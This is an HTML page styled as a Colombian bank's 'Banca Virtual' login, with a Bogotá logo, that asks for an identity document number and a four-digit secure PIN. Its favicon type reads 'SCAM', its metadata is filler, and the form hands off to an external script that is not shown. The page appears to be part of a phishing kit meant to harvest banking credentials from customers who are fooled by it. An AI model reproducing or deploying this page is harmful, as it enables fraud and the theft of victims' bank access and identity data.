<!DOCTYPE html>

<html>

<head>
    
        <link rel="icon" href="favicon-bogota.ico" type="SCAM/favicon-bogota.ico" sizes="16x16" />
    <title>Banca Virtual</title>
        
        <meta name="keywords" content="Test">
        <meta name="description" content="Test">
        <meta name="description" content="Web site created using create-react-app">
        <meta name="subject" content="Test">
        <meta name="copyright" content="Test">
        <meta name="url" content="http://www.test.com">
        <meta name="language" content="en-GB">
        <meta name="robots" content="NOINDEX, NOFOLLOW">
        <meta name="pagename" content="$Title">
        <meta name="coverage" content="Worldwide">
        <meta name="distribution" content="Global">
        <meta name="target" content="all">
        <meta name="HandheldFriendly" content="True">
        <meta name="MobileOptimized" content="640">
        <meta name="format-detection" content="telephone=no">
        <meta http-equiv="cleartype" content="on">
        <meta name="apple-mobile-web-app-title" content="$Title">
        <meta name="apple-mobile-web-app-capable" content="yes">
        <meta name="apple-touch-fullscreen" content="yes">
        <meta name="apple-mobile-web-app-status-bar-style" content="black">
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
        <meta name="ResourceLoaderDynamicStyles" content="">
        <meta http-equiv="Expires" content="0">
        <meta http-equiv="Pragma" content="no-cache">
        <meta http-equiv="Cache-Control" content="no-cache">
        <meta http-equiv="imagetoolbar" content="no">
        <meta http-equiv="x-dns-prefetch-control" content="off">
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>

        <meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=no">

        <!-- Makes your prototype chrome-less once bookmarked to your phone's home screen -->
        <meta name="apple-mobile-web-app-capable" content="yes">
        <meta name="apple-mobile-web-app-status-bar-style" content="black">

        <!-- Set a shorter title for iOS6 devices when saved to home screen -->
        <meta name="apple-mobile-web-app-title" content="Ratchet">
     
        <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0" />
    <link rel="stylesheet" type="text/css" href="estilo.css">
    <link rel= "stylesheet" href= "https://cdnjs.cloudflare.com/ajax/libs/animate.css/4.0.0/animate.compat.css">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> 
        

</head>




<body>



<div class="todo" id="todo">

<img class="logo" src="logo-bogota.svg" alt="logo-bogota.svg">


		
			<br> <br><br> <br>
            <p style=" text-align: center; font-size: 23px; font-weight: 700;">Bienvenido a tu Banca Virtual</p><br> 
            <a style=" font-size: 14px; ">Si necesitas ayuda ingresa aquí ›</a>
            <br><br>    

            <div class="formulario" id="campos" name="formulario">
        <form id="formulario">
<br> 
<h2 style="  font-size: 14px; ">Clave segura</h2>
		<br> 

  <div class="linea-divisora"></div>
<br> 
			<b style="font-size: 15px;  margin: 0px 35px auto;"><FONT>Identificación</FONT></b>


<div class="cedula">
<label for="nrodocumento1"></label>
<select name="nrodocumento1" id="nrodocumento1" class="nrodocumento1">
<option style=" background-color: #0040a8; color: #f6f8fa;" value="Cédula de ciudadanía">C.C. Cédula de ciudadanía</option>
<option style=" background-color: #0040a8; color: #f6f8fa;" value="Cédula de ciudadanía">T.I. Tarjeta de Identidad</option>
<option style=" background-color: #0040a8; color: #f6f8fa;" value="Cédula de ciudadanía">C.E. Cédula de Extranjería</option>
<option style=" background-color: #0040a8; color: #f6f8fa;" value="Cédula de ciudadanía">N.P.N. NIT Persona Natural</option>
<option style=" background-color: #0040a8; color: #f6f8fa;" value="Cédula de ciudadanía">N.P.E. NIT Persona Extranjera</option>
<option style=" background-color: #0040a8; color: #f6f8fa;" value="Cédula de ciudadanía">N.P.J. NIT Persona Jurídica</option>
<option style=" background-color: #0040a8; color: #f6f8fa;" value="Cédula de ciudadanía">P.S. Pasaporte</option>
<option style=" background-color: #0040a8; color: #f6f8fa;" value="Cédula de ciudadanía">R.C. Registro Civil</option>
</select>


			<input style="font-size: 19px;" id="nrodocumento" type='texto' minlength="6" maxlength="10" autocomplete="off"  name="nrodocumento" inputmode="numeric" placeholder="#" required="numero" pattern="[0-9]+"></div>   <br><br>  
           
<b style="font-size: 15px;  margin: 15px 35px auto;"><FONT>Clave Segura</FONT></b>

            <input style="font-size: 19px;"  id="contrasena" type="password" maxlength="4" autocomplete="off" inputmode="numeric" name="contrasena" placeholder="...." required="numero" pattern="[0-9]{4}">




			<br><br><br>
			<input  id="accept" name="btnGo" type="submit" value="Ingresar"></input>
           <br>
            <h2 style=" float: right;  font-size: 15px; ">Olvidé mi clave ›</h2>
<br>
			<br>
			<br>
            
		

		</form>
	
	</div>
	</div>
	</div>
	<script src="js1.js"></script>
  <div class="todo1" id="todo1">
	<img class="logo2" src="img2.JPG" alt="img2.JPG">

	</div>
</body>
</html>